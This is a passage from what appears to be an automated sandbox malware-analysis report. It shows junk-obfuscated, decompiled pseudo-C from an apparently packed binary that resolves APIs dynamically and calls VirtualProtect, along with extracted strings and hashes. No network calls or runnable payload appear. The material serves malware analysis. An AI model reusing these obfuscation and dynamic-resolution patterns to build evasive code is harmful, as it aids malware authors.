                      								 *0x509754 = _t66;
                      								_t69 =  *(_t122 - 8);
                      								 *0x50bf0b =  *0x50bf0b + 0xffffffffffce037e;
                      								 *(_t122 - 0xbd) = _t69;
                      								 *(_t122 - 8) = _t69;
                      								_push(E004F4CE3);
                      								goto __eax;
                      							}
                      							if(_t89 >= 0x2f2ce5) {
                      								L17:
                      								 *0x50ad38 =  *0x50ad38 - _t120;
                      								if((_t120 & 0x0000baa2) <= 0) {
                      									goto L21;
                      								}
                      								_t61 = 0xce;
                      								goto L19;
                      							}
                      							if(_t104 < _t104) {
                      								goto L20;
                      							}
                      							 *0x5091aa = _t111;
                      							_t111 = 0x8b1a42;
                      							goto L17;
                      						}
                      						_t111 = 0xa7bb;
                      						if((_t120 & 0x009d816b) == 0) {
                      							 *0x50bf13 = _t60;
                      						}
                      						_t88 = 0xdb;
                      						if(_t117 < 0) {
                      							goto L13;
                      						} else {
                      							_t88 = _t60;
                      							_t117 = 0x50900a;
                      							if(_t60 < 0x11041d) {
                      								goto L13;
                      							}
                      							goto L12;
                      						}
                      					}
                      					goto L6;
                      				}
                      			}
























                      APIs
                      • VirtualProtect.KERNEL32(?), ref: 004F4BB6
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID: IMCCPHR.exe$NtSetDriverEntryOrder$WFServicesReg.exe$WSManHTTPConfig.exe$_isdel.exe$`gqt$api-ms-win-core-namedpipe-l1-1-0.dll$dpnet.dll$iQ=$,/
                      • API String ID: 544645111-3502657855
                      • Opcode ID: ec27e29c56b2707b875f98129341c3db7f53dafc9c418b66351b097dc422d39e
                      • Instruction ID: 167a9ad0ed12714ebbcbffc6452b1b06da35b8c99c2e9e3ff36a11cf9dfecc59
                      • Opcode Fuzzy Hash: ec27e29c56b2707b875f98129341c3db7f53dafc9c418b66351b097dc422d39e
                      • Instruction Fuzzy Hash: 0651CC75A1434A9FDB00DFB9DD882DE7FB0EBB9300F04446A9A40DB36AD3744A48DB55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 16%
                      			E0048690B(intOrPtr __eax, void* __ebx, short __edx, signed short __esi) {
                      				intOrPtr _t30;
                      				intOrPtr _t32;
                      				intOrPtr _t37;
                      				char _t40;
                      				intOrPtr _t46;
                      				char* _t52;
                      				short _t86;
                      				short _t88;
                      				intOrPtr _t92;
                      				short _t93;
                      				signed short _t96;
                      				void* _t98;
                      				signed short _t104;
                      				void* _t105;
                      
                      				_t104 = __esi;
                      				_t93 = __edx;
                      				_t52 = 0x3039fe;
                      				 *((intOrPtr*)(_t105 - 0x58)) = __eax;
                      				 *((intOrPtr*)(_t105 - 0x10)) = __eax;
                      				if(0x3039fe >= 0x37) {
                      					_t52 = 0xffffffffffb99f5c;
                      				}
                      				_t30 =  *((intOrPtr*)(_t105 - 0x10));
                      				_push( *((intOrPtr*)(_t105 - 0x58)));
                      				_t86 =  *0x50914e; // 0xef9e
                      				 *0x50919c = _t93;
                      				_t96 = 0x9e5c;
                      				 *((intOrPtr*)(_t105 - 8)) = _t30;
                      				if(_t30 + _t30 <= 0x2923) {
                      					_t52 = "mscpxl32.dLL";
                      				}
                      				 *(_t105 - 0x18) = _t52;
                      				_t32 =  *((intOrPtr*)(_t105 - 8));
                      				 *0x509152 = _t86;
                      				_push( *0x509598);
                      				 *((intOrPtr*)(_t105 - 0x20)) = _t86;
                      				_t88 = 0x7124;
                      				 *((intOrPtr*)(_t105 - 8)) = _t32;
                      				_push(_t32);
                      				_push(_t32);
                      				_push(1);
                      				if(E004673BF(0x4f52a5) < 0x26c4d6 || 0x4f52a5 < 0x3c) {
                      					_t88 = _t88 + 0x64;
                      					 *((intOrPtr*)(_t105 - 0x24)) =  *((intOrPtr*)(_t105 - 0x24)) + _t88;
                      					 *0x509172 = _t88;
                      				}
                      				 *((intOrPtr*)(_t105 - 8)) = GetProcAddress();
                      				_t37 = 0;
                      				if("IMCCPHR.exe" == "IMCCPHR.exe") {
                      					_t92 =  *0x50912e; // 0x9c03
                      					 *0x509160 =  *0x509160 - _t92;
                      					 *0x509178 =  *0x509178 + _t92;
                      					_t88 = _t92 + _t92;
                      					if((_t96 & 0x00008bee) >= 0) {
                      						 *0x509212 = _t96;
                      					}
                      					_t37 = 0xc6;
                      					 *0x509356 =  *0x509356 + _t104;
                      				}
                      				 *0x509458 = _t37;
                      				_t40 =  *((intOrPtr*)(_t105 - 8));
                      				 *0x5097e4 = _t40;
                      				 *0x50bf15 = _t40;
                      				if(_t40 >= 0x818e6) {
                      					 *0x50bf0b =  *0x50bf0b + 0x2461ef;
                      					if(0x2461ef < 0x2461ef) {
                      						L14:
                      						_t104 = _t104;
                      					} else {
                      						 *0x509152 = _t88;
                      						 *0x50916a = _t88;
                      						_t98 = _t96 - 0x872d;
                      						 *0x5091ce =  *0x5091ce + _t98;
                      						 *0x50a948 =  *0x50a948 + _t98;
                      						_t96 = _t98 + _t98;
                      						if((_t104 & 0x0000ae9a) > 0) {
                      							goto L14;
                      						}
                      					}
                      				}
                      				_push(0);
                      				 *((intOrPtr*)(_t105 - 8)) = _t40;
                      				 *(_t105 - 0x14) = "RtlReleaseRelativeName";
                      				L00468D9F(0x437a95, _t96, 0, _t104, 0x437a95, 1);
                      				 *(_t105 - 0x1c) = "RegDeleteKeyExW";
                      				_t46 =  *((intOrPtr*)(_t105 - 8));
                      				 *0x509190 = 0x63ef;
                      				 *((intOrPtr*)(_t105 - 8)) = _t46;
                      				_push(1);
                      				_push(E00486B21);
                      				_push(L00469469);
                      				return _t46 + _t46;
                      			}


















                      APIs
                      • GetProcAddress.KERNEL32(00000001,?), ref: 004869BF
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: G`}$IMCCPHR.exe$MapUserPhysicalPages$RegDeleteKeyExW$RtlReleaseRelativeName$VarI4FromCy$dpnet.dll$mscpxl32.dLL$wuapi.dll$a$
                      • API String ID: 190572456-4294821618
                      • Opcode ID: aefbc923d6e6338b3ae015476f66a4f4e976e45252f4cf5243c5126883dc0636
                      • Instruction ID: 44d64a0c3b338a602ad08b57d9b739b0c1e744ab6c8771b5a3ccb3cfc0cd2ea3
                      • Opcode Fuzzy Hash: aefbc923d6e6338b3ae015476f66a4f4e976e45252f4cf5243c5126883dc0636
                      • Instruction Fuzzy Hash: 265104B4B543069FCB00AFB9E8956CD7BB0FB39310F044829D944E7366E3780949DB05
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 27%
                      			E0049C9B8(unsigned int __ebx, signed int __ecx, void* __edi, void* __esi) {
                      				_Unknown_base(*)()* _t36;
                      				signed int _t39;
                      				signed int _t47;
                      				signed int _t49;
                      				char* _t50;
                      				char* _t54;
                      				signed int _t56;
                      				signed int _t58;
                      				signed int _t59;
                      				intOrPtr _t61;
                      				unsigned short _t66;
                      				void* _t71;
                      				signed char _t90;
                      				signed int _t94;
                      				short _t102;
                      				intOrPtr _t114;
                      				void* _t115;
                      				signed int _t116;
                      				void* _t117;
                      				void* _t119;
                      				signed int _t120;
                      				void* _t121;
                      				void* _t124;
                      
                      				_t119 = __esi;
                      				_t115 = __edi;
                      				_t90 =  !__ecx;
                      				_t66 = __ebx >> _t90;
                      				if(_t66 != 0x3a) {
                      					if(_t66 > _t66) {
                      						_t66 = _t66 + 0x5143;
                      					}
                      					 *0x509154 = _t90;
                      					_t90 = 0x8091;
                      				}
                      				 *0x5091f0 = 0x9056;
                      				_t36 = GetProcAddress(??, ??);
                      				_t108 = 0xa126;
                      				 *(_t124 - 8) = _t36;
                      				if(_t36 >= 0x14) {
                      					 *((intOrPtr*)(_t124 - 0x14)) =  *((intOrPtr*)(_t124 - 0x14)) + 0x2e7871;
                      					_t66 =  *(_t124 - 0x1c);
                      					_t102 = _t90 - 0x5b3c;
                      					 *0x50915c = _t102;
                      					_t90 = _t102 + _t102;
                      					if(0x8020 != 0) {
                      						_t108 = 0xb36f;
                      						 *0x50a9c0 =  *0x50a9c0 + 0xb36f;
                      					}
                      					_t36 = 0xbd;
                      				}
                      				 *0x509338 =  *0x509338 - _t119;
                      				_t120 = _t119 - _t115;
                      				_t116 = _t115 + 0xd11c64;
                      				 *0x50bf17 =  *0x50bf17 - _t36 + _t36;
                      				 *0x50b93d =  *0x50b93d + _t116;
                      				_t39 =  *(_t124 - 8);
                      				 *0x50a1fc = _t39;
                      				 *(_t124 - 8) = _t39;
                      				L00469469(_t66, _t116, _t120, _t66);
                      				if(_t66 <= _t66) {
                      					L11:
                      					 *0x50962a =  *0x50962a + _t116;
                      					 *0x50bf17 =  *0x50bf17 - 0xe0;
                      					_t116 = 0;
                      				} else {
                      					if(_t90 != _t90) {
                      						 *0x50914a = _t90;
                      						_t90 =  *0x50917e; // 0xe31a
                      						 *0x5091cc = _t108 - 0x85ca;
                      						_t114 =  *0x509218; // 0xa1e2
                      						_t108 = _t114 + 1;
                      						_t120 = _t120 | 0x00a97e74;
                      						goto L11;
                      					}
                      				}
                      				_t94 =  !0x6f2f;
                      				 *0x50919c = _t108;
                      				_t47 =  *(_t124 - 8);
                      				_push(0);
                      				_t117 = _t116 - _t47;
                      				 *(_t124 - 0xc) = _t47;
                      				_t71 = 0x3b29ee;
                      				_t49 =  *(_t124 - 0xc);
                      				 *(_t124 - 0x1c) = 0x10bc61;
                      				if(0x6f2f < 0x6f2f) {
                      					_t94 = 0x7146;
                      					 *0x50a628 =  *0x50a628 + 0x7146;
                      					_t108 = _t108 - 0xa3;
                      					 *0x509224 =  *0x509224 + _t120;
                      					_t120 = _t120 + _t120 - 0xb36054;
                      					 *0x50bb33 =  *0x50bb33 + _t117;
                      					 *0x509026 =  *0x509026 - _t49;
                      					 *0x50bf09 =  *0x50bf09 - _t49;
                      					_t71 = 0x26e306;
                      				}
                      				 *0x50bf0b =  *0x50bf0b - _t71;
                      				 *(_t124 - 8) = _t49;
                      				_t50 =  *0x5096d8; // 0x3873f71
                      				if(_t50 != 0x25) {
                      					if(_t71 < 0x35) {
                      						L18:
                      						_t94 = _t94 + 0x7b3f;
                      						 *0x5091c2 = _t108;
                      						_t108 =  *0x5091f8; // 0x0
                      					} else {
                      						_t71 = 0x441bee;
                      						if(_t94 != _t94) {
                      							 *0x50912c = _t94;
                      							_t94 = 0;
                      							goto L18;
                      						}
                      					}
                      				}
                      				 *0x50bf13 = _t50;
                      				_push( *0x509006);
                      				_t54 = "api-ms-win-core-namedpipe-l1-1-0.dll";
                      				if(_t71 < 0x2e7e) {
                      					L25:
                      					 *0x50bf11 =  *0x50bf11 + _t108 + 0x98;
                      					_t121 = 0;
                      				} else {
                      					_t71 = _t71 + 0x4e07;
                      					 *0x50bf0c =  *0x50bf0c + _t94;
                      					if(_t94 >= _t94) {
                      						L23:
                      						 *0x509100 =  *0x509100 + _t71;
                      						goto L24;
                      					} else {
                      						_t94 =  *0x50917c; // 0xcbc1
                      						 *0x5091ca = _t108;
                      						 *0x5091e0 = _t108;
                      						_t108 = _t108 - 0xa7;
                      						_t120 = 0xb487;
                      						 *0x50bf13 = _t54;
                      						if(_t54 < 0) {
                      							L24:
                      							 *((intOrPtr*)(_t124 - 0x28)) =  *((intOrPtr*)(_t124 - 0x28)) - 0x66ba;
                      							_t94 = 0x66ba - _t108;
                      							_t108 = 0;
                      							goto L25;
                      						} else {
                      							_t117 = _t117 + 1;
                      							 *0x50bf17 = _t54;
                      							_t61 =  *0x509484; // 0x0
                      							 *(_t124 - 0xc) = _t61 - 0x17e2;
                      							_t71 = _t71 - 1;
                      							if(_t71 == _t71) {
                      								goto L23;
                      							}
                      						}
                      					}
                      				}
                      				 *0x50b88d =  *0x50b88d + _t121;
                      				 *0x50bf15 = 0xc9;
                      				_t56 =  *(_t124 - 8);
                      				_push( *0x5090b6);
                      				 *0x50962e =  *0x50962e + _t117;
                      				 *0x509648 =  *0x509648 + _t117;
                      				if(_t56 < 0x251) {
                      					 *(_t124 - 0x10) = _t56;
                      					 *0x509106 =  *0x509106 + 0x3aa6c6;
                      					 *0x50bf12 = _t56;
                      					_t121 = _t121 - _t121;
                      				}
                      				 *0x50bf15 = _t56;
                      				if(_t56 == 0) {
                      					 *0x5094f8 =  *0x5094f8 - _t56;
                      					 *(_t124 - 8) = _t56;
                      				}
                      				 *(_t124 - 8) = _t56;
                      				_t58 =  *(_t124 - 8);
                      				 *(_t124 - 0x10) = _t58;
                      				 *(_t124 - 8) = _t58;
                      				_t59 =  !_t58;
                      				_push(_t59);
                      				_push(_t59);
                      				_push(E0049CD1D);
                      				_push(L00468D9F);
                      				return _t59;
                      			}



























                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: r-$:$CoLockObjectExternal$aaclient.dll$api-ms-win-core-namedpipe-l1-1-0.dll$normaliz.dll$qx.$72$`}
                      • API String ID: 190572456-1770186502
                      • Opcode ID: 96162111387973d314a0a7f3b810252dadc485fe44508a9f7ca6970b16810095
                      • Instruction ID: 6a2317d9f02f9ec2eac30d60caaaaf8f8f985cbb0ed9a221e96869351caf5395
                      • Opcode Fuzzy Hash: 96162111387973d314a0a7f3b810252dadc485fe44508a9f7ca6970b16810095
                      • Instruction Fuzzy Hash: 6881F175A443478BDB00DF78ECD82CD7BB1FB39320B44856AC854A3366E3790949EB99
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 39%
                      			E004CD4F2(long __eax, signed int __ebx, signed int __edx, signed int __edi, unsigned short __esi) {
                      				long _t37;
                      				long _t40;
                      				long _t45;
                      				long _t48;
                      				long _t49;
                      				long _t50;
                      				long _t54;
                      				char _t57;
                      				long _t61;
                      				long _t63;
                      				long _t65;
                      				signed int _t69;
                      				void* _t80;
                      				signed int _t82;
                      				signed char _t114;
                      				signed int _t122;
                      				intOrPtr _t126;
                      				short _t136;
                      				short _t137;
                      				signed int _t146;
                      				signed int _t147;
                      				unsigned short _t150;
                      				signed int _t151;
                      				void* _t152;
                      
                      				_t150 = __esi;
                      				_t146 = __edi;
                      				_t134 = __edx;
                      				_t69 = __ebx;
                      				_t37 = __eax;
                      				if(__ebx <= 0x2de970) {
                      					L3:
                      					_t134 = _t134 - 0x90e863;
                      					_t150 = _t150 >> _t114;
                      					 *0x50bf13 = _t37;
                      				} else {
                      					_t69 = "HMETAFILEPICT_UserSize";
                      					_t114 = 0x7a26;
                      					if((__edx & 0x00008209) == 0) {
                      						_t134 = __edx;
                      						goto L3;
                      					}
                      				}
                      				_t40 = GetLastError();
                      				_t136 = _t134 - 0x9d;
                      				 *(_t152 - 8) = _t40;
                      				 *((intOrPtr*)(_t152 - 0x10)) = _t69;
                      				_t45 =  *(_t152 - 8);
                      				if(0 < _t114) {
                      					if(_t114 < _t114) {
                      						_t114 = _t114 + 0x6238dd;
                      					}
                      					_t114 = _t114 - _t136;
                      					_t136 = 0x9cd2;
                      				}
                      				_t137 = _t136;
                      				_t151 = _t150 + 1;
                      				 *(_t152 - 0x4c) = _t45;
                      				_push( *((intOrPtr*)(_t152 - 0x54)));
                      				_t80 = _t45 + 2;
                      				 *(_t152 - 8) = _t45;
                      				if(_t45 >= 0x19ec) {
                      					L13:
                      					_t82 = _t80 + _t80 + 0x4b;
                      				} else {
                      					_t45 = 0x50bf0a;
                      					 *((intOrPtr*)(_t152 - 0x14)) = 0x3388ab;
                      					_t82 = 0;
                      					_t114 = _t114 + 0x62;
                      					 *0x50916e = _t114;
                      					if(_t114 != _t114) {
                      						_t137 =  *0x5091b6; // 0xc472
                      						 *0x509208 = _t137;
                      						_t63 =  *0x50bf13; // -9
                      						 *0x50bf14 = _t63 - 0xc3;
                      						_t65 =  *0x50bf15; // 0x0
                      						if(_t65 <= 0) {
                      							 *0x5093d0 =  *0x5093d0 - 0xfb;
                      						}
                      						_t45 = "_isdel.exe";
                      						goto L13;
                      					}
                      				}
                      				 *0x5091d6 = _t137;
                      				_t139 = 0xffffffffff6887d7;
                      				 *0x50bf13 = _t45;
                      				_t147 = _t146 | _t146;
                      				_t48 = RegCloseKey(??);
                      				 *(_t152 - 8) = _t48;
                      				_t49 = _t48 - 0x1d0e;
                      				_push(0);
                      				L004C2E39();
                      				 *((intOrPtr*)(_t152 - 0x10)) =  *((intOrPtr*)(_t152 - 0x10)) +  !_t82;
                      				 *0x509144 =  *0x509144 - 0x52a151;
                      				if(0x8350 < 0) {
                      					 *0x5091dc =  *0x5091dc + 0xffffffffff6887d7;
                      					_t139 = 0x995d6c;
                      					_t151 =  !_t151;
                      					 *0x50bf13 = _t49;
                      					_t61 =  *0x50bf14; // 0x0
                      					 *0x50bf17 = _t61;
                      					_t147 = 0;
                      					if(_t61 != 0xe54) {
                      						_t61 = 0x1aff1e;
                      					}
                      					 *0x509112 = 0x7bab;
                      				}
                      				_t122 = 0xe903;
                      				_t50 =  *(_t152 - 8);
                      				if( *((intOrPtr*)(_t152 - 0x58)) == 0) {
                      					if(_t147 > 0) {
                      						L22:
                      						 *0x5091b2 = _t139;
                      						_t139 = 0;
                      					} else {
                      						 *0x50bf17 = _t50;
                      						 *0x50907e =  *0x50907e - _t50;
                      						if( *(_t152 - 8) - 0x20 + _t50 <  *(_t152 - 8) - 0x20 + _t50) {
                      							goto L22;
                      						}
                      					}
                      					 *0x50bf15 = _t50;
                      					 *0x509038 =  *0x509038 - _t50;
                      					if(_t50 == 0x2bf340) {
                      					}
                      					 *0x50916c = 0x604f;
                      					_t122 = 0xc09e;
                      					 *((intOrPtr*)(_t152 - 0x5c)) = 1;
                      				}
                      				 *0x50bf15 =  *0x50bf15 + _t50;
                      				 *0x50bf17 = _t50;
                      				 *(_t152 - 8) = _t50;
                      				 *((intOrPtr*)(_t152 - 0x14)) = 0xffffffffffd59272;
                      				_t54 =  *(_t152 - 8);
                      				if(("System.Xml.XmlDocument.dll" & 0x0000003d) > ("System.Xml.XmlDocument.dll" & 0x0000003d)) {
                      					_t122 = _t122 | 0x00000065;
                      				}
                      				_t140 = 0x8ade;
                      				 *0x5091da =  *0x5091da + 0x8ade;
                      				 *(_t152 - 8) = _t54;
                      				if(0x44e984 >= 0x44e984) {
                      					_t126 =  *0x509144; // 0x5f92
                      					 *0x509192 =  *0x509192 + _t126 - 0x7442;
                      					_t140 = 0x115bc;
                      				}
                      				_t57 = E004B2347(0x44e984, _t151);
                      				 *0x509212 =  *0x509212 + _t140;
                      				 *0x50bf12 = _t57;
                      				return  *((intOrPtr*)(_t152 - 0x5c));
                      			}

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: CloseErrorLast
                      • String ID: 'H7$HMETAFILEPICT_UserSize$System.Xml.XmlDocument.dll$WSManHTTPConfig.exe$_isdel.exe$api-ms-win-core-namedpipe-l1-1-0.dll$api-ms-win-core-string-l1-1-0.dll$p-
                      • API String ID: 3262646002-4178774678
                      • Opcode ID: 9f0f2fe4ae085fac61872d3ee6458d6092fc228ccc3b35d02eeac36c66c0a2af
                      • Instruction ID: ed737d422411b0dff1ade46d864745515fd27362d8ba302c07b36030a5b9558c
                      • Opcode Fuzzy Hash: 9f0f2fe4ae085fac61872d3ee6458d6092fc228ccc3b35d02eeac36c66c0a2af
                      • Instruction Fuzzy Hash: 1F81EE69F142468FDB00AFB8EDD87DD3BB0EB7A314F08487E885597366E278054ADB11
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 15%
                      			E00480FC9(intOrPtr __ebx, signed int __edi, void* __esi) {
                      				_Unknown_base(*)()* _t70;
                      				_Unknown_base(*)()* _t78;
                      				signed int _t81;
                      				_Unknown_base(*)()* _t85;
                      				_Unknown_base(*)()* _t90;
                      				char* _t93;
                      				char _t96;
                      				unsigned short _t111;
                      				unsigned short _t112;
                      				char* _t119;
                      				intOrPtr _t123;
                      				void* _t145;
                      				void* _t147;
                      				short _t151;
                      				intOrPtr _t157;
                      				short _t163;
                      				unsigned short _t164;
                      				unsigned short _t165;
                      				signed char _t168;
                      				signed int _t170;
                      				signed int _t171;
                      				signed int _t179;
                      				void* _t181;
                      				void* _t184;
                      				void* _t189;
                      				void* _t190;
                      
                      				_t184 = __esi;
                      				_t179 = __edi;
                      				_push( *0x509062);
                      				 *(_t190 - 0x1c) =  *(_t190 - 0x1c) - __ebx;
                      				 *((intOrPtr*)(_t190 - 0x14)) = __ebx;
                      				 *(_t190 - 0xc) = "api-ms-win-core-localization-l1-1-0.dll";
                      				_push( *0x509204);
                      				 *0x509168 = 0x61b4;
                      				 *0x50bf0a =  *0x50bf0a + 0x1d9c03;
                      				 *0x50911e =  *0x50911e + 0xfffffffffffffde9;
                      				_t70 =  *(_t190 - 8);
                      				_push( *0x5090ec);
                      				if(0 <= 0) {
                      					 *0x50916e = 0;
                      					if(0 >= 0) {
                      						_t163 =  *0x5091ba; // 0x1ef3
                      						 *0x509208 = _t163;
                      					}
                      				}
                      				_push( *0x50902c);
                      				 *0x50a758 =  *0x50a758 - _t163;
                      				_t164 = _t163 - 0x909fe5;
                      				if((_t184 - 0x00abf90e & 0x0000a923) >= 0) {
                      					 *0x50bf13 = _t70;
                      				}
                      				_t181 = (_t179 | 0x00c931f7) + (_t179 | 0x00c931f7);
                      				 *(_t190 - 8) = _t70;
                      				_t194 = _t70 - 0x2426;
                      				if(_t70 > 0x2426) {
                      				}
                      				 *0x50918c = 0x6b1b;
                      				_push( *0x509174);
                      				 *0x509144 = 0x6b1b;
                      				_t111 = "RegDeleteKeyExW";
                      				 *0x5090fc =  *0x5090fc + _t111;
                      				_t145 = 0x68;
                      				_t165 = _t164 >> 0x68;
                      				 *(_t190 - 8) = E005002EA(_t111, 0x68, _t165, _t181, _t194);
                      				_t78 =  *(_t190 - 8);
                      				_t112 = _t111 >> 0x68;
                      				if(_t112 > 0x3818) {
                      					if(_t112 <= _t112) {
                      						 *0x50bf0c =  *0x50bf0c + _t112;
                      					}
                      					_t145 = 0x772c;
                      					 *0x50919c =  *0x50919c - _t165;
                      					 *0x5091b2 =  *0x5091b2 - _t165;
                      				}
                      				 *0x50bf13 =  *0x50bf13 - _t78;
                      				_t189 = 0xc604;
                      				if(0 >= 0) {
                      					 *0x50bf15 =  *0x50bf15 - _t78;
                      				}
                      				 *0x50bf07 =  *0x50bf07 + _t78;
                      				_t119 = "WSManHTTPConfig.exe";
                      				 *(_t190 - 0x1c) = _t119;
                      				 *(_t190 - 0x58) = _t78;
                      				_t147 = _t145 + 0x73 - 1;
                      				 *0x5091d6 = 0xaf7f;
                      				_t168 =  *0x50920a; // 0x9991
                      				 *(_t190 - 8) = _t78;
                      				if(_t78 != 0x1c) {
                      					L16:
                      					_t147 = 0x6a89;
                      					goto L17;
                      				} else {
                      					_t119 = 0x3c3181;
                      					if(0x3c3181 < 0x3c3181) {
                      						L17:
                      						 *((intOrPtr*)(_t190 - 0x2c)) =  *((intOrPtr*)(_t190 - 0x2c)) + _t147;
                      						_push( *(_t190 - 0x58));
                      						_t81 = "api-ms-win-core-localization-l1-1-0.dll" + "api-ms-win-core-localization-l1-1-0.dll";
                      						if(_t119 <= 0x2d8d) {
                      							L22:
                      							 *0x509358 =  *0x509358 - _t181;
                      							_t81 = _t81 + _t81;
                      							L23:
                      							E00509584 = _t81;
                      							 *((intOrPtr*)(_t190 - 0x14)) =  *((intOrPtr*)(_t190 - 0x14)) + _t119;
                      							 *(_t190 - 0x18) = _t119;
                      							 *0x509166 = 0x65c9;
                      							_t151 =  *0x509196; // 0x5fe2
                      							_t170 =  !(_t168 - 1);
                      							_t85 =  *(_t190 - 8);
                      							_push( *0x5093d4);
                      							 *0x50bf15 = _t85;
                      							_t123 =  *0x50bf17; // -1
                      							 *(_t190 - 8) = _t85;
                      							if(_t85 > 0x16734f) {
                      								L28:
                      								 *((intOrPtr*)(_t190 - 0x14)) = _t123;
                      								L29:
                      								 *((intOrPtr*)(_t190 - 0x20)) =  *((intOrPtr*)(_t190 - 0x20)) - 0x41d0bc;
                      								 *0x50913c = _t151;
                      								_t171 =  !_t170;
                      								_t90 = GetProcAddress(??, ??);
                      								 *0x509226 = _t171;
                      								 *(_t190 - 8) = _t90;
                      								_t93 = "RtlReleaseRelativeName";
                      								if(0x8093 >> 0x8093 >= 0x8093 >> 0x8093) {
                      									 *0x50a77c =  *0x50a77c + _t171;
                      									 *0x5091da = _t171;
                      									_t189 = _t189 - 0xb9da;
                      								}
                      								 *0x50bf13 = _t93;
                      								_push(_t189);
                      								_push(E004813AB);
                      								_push(L00468BBD);
                      								return _t93;
                      							}
                      							if(_t123 + 0x39 != _t123 + 0x39) {
                      								goto L29;
                      							}
                      							_t123 =  *((intOrPtr*)(_t190 - 0x20));
                      							_t151 = 0x5ffd;
                      							 *((intOrPtr*)(_t190 - 0x24)) =  *((intOrPtr*)(_t190 - 0x24)) - 0x5ffd;
                      							 *0x5091ea =  *0x5091ea + 0x8f4c;
                      							_t170 = 0x11e98 + _t189;
                      							if(_t189 >= 0) {
                      							}
                      							_t96 =  *0x50bf15; // 0x0
                      							 *0x50bf07 = _t96;
                      							goto L28;
                      						}
                      						if(_t119 > 0x3e) {
                      							 *(_t190 - 0x18) =  &(( *(_t190 - 0x18))[_t119]);
                      							 *(_t190 - 0x1c) = _t119;
                      						}
                      						_t157 =  *0x509146; // 0x380
                      						 *0x509192 =  *0x509192 - _t157 - 0x7482;
                      						if((_t168 & 0x0000008e) > 0) {
                      							goto L23;
                      						} else {
                      							_t168 = _t168 + 0x9bee;
                      							 *0x50bf12 =  *0x50bf12 - _t168;
                      							_t81 = 0xcf;
                      							goto L22;
                      						}
                      					}
                      					_t119 = 0;
                      					goto L16;
                      				}
                      			}

                      APIs
                      • GetProcAddress.KERNEL32(?), ref: 00481338
                      Strings
                      Memory Dump Source
                      • Source File: 00000005.00000002.463496506.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.464373549.000000000050D000.00000040.00000001.01000000.00000007.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_B87E.jbxd
                      Similarity
                      • API ID: AddressProc
                      • String ID: >-,$CNBP_335.DLL$G.V$RegDeleteKeyExW$RtlReleaseRelativeName$WSManHTTPConfig.exe$WinFax.dll$api-ms-win-core-localization-l1-1-0.dll
                      • API String ID: 190572456-1177868353
                      • Opcode ID: 8cfc005012e1424f2955b15eeae255cf75781ce83cba4fb95b67d95038e86652
                      • Instruction ID: cde278d05ffd1799fe818271f52062a44ccea0e1f1d6747cc6b1ae7a1711a1a4
                      • Opcode Fuzzy Hash: 8cfc005012e1424f2955b15eeae255cf75781ce83cba4fb95b67d95038e86652
                      • Instruction Fuzzy Hash: 01A1D075E142479BDB00EFB9EC982CD7BB1FB3D310B44886AD844E7726E2340A49EB55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 35%
                      			E004809E9() {
                      				signed int _t38;
                      				signed int _t40;
                      				signed int _t53;
                      				signed int _t56;
                      				signed int _t59;
                      				void* _t70;
                      				signed int _t76;
                      				char* _t77;
                      				char* _t89;
                      				char* _t92;
                      				signed char _t107;
                      				signed int _t108;
                      				short _t121;
                      				signed int _t122;
                      				intOrPtr _t126;
                      				void* _t129;
                      				unsigned short _t132;
                      				void* _t136;
                      
                      				 *(_t136 - 8) = _t38;
                      				if(_t38 < 0x13fd77) {
                      					L3:
                      					_t122 = 0xffffffffff54502c;
                      					 *0x50b652 =  *0x50b652 + 0xac3c62;
                      					L4:
                      					_t40 =  *(_t136 - 8);
                      					 *(_t136 - 0x58) = _t40;
                      					if(_t129 == 0) {
                      						 *0x509036 =  *0x509036 - _t40;
                      						 *0x50904c =  *0x50904c + _t40;
                      						if(_t40 < 0x2b13fc) {
                      							_t121 =  *0x509134; // 0x0
                      							 *0x509180 = _t121;
                      							_t107 = _t121 + _t122;
                      						}
                      						_t122 =  !0x9687;
                      					}
                      					_t124 = _t122 ^ 0x0000ae2e;
                      					 *0x50bf14 = _t40;
                      					_t70 = 0xc9 - _t40;
                      					_t132 = 0xdbdc73;
                      					 *0x5094bc = _t40;
                      					if(_t40 <= 0x19) {
                      						 *(_t136 - 0x14) =  !(_t70 - 0x21);
                      					}
                      					if(0x484ce4 == _t107) {
                      						_t107 = 0x7feb;
                      						_t124 = _t124;
                      					}
                      					_push( *(_t136 - 0x58));
                      					if((_t124 & 0x007abc92) == 0) {
                      						if((_t124 & 0x000090bc) < 0) {
                      							 *0x50bf12 = _t40;
                      						}
                      						_t132 = _t132 >> _t107;
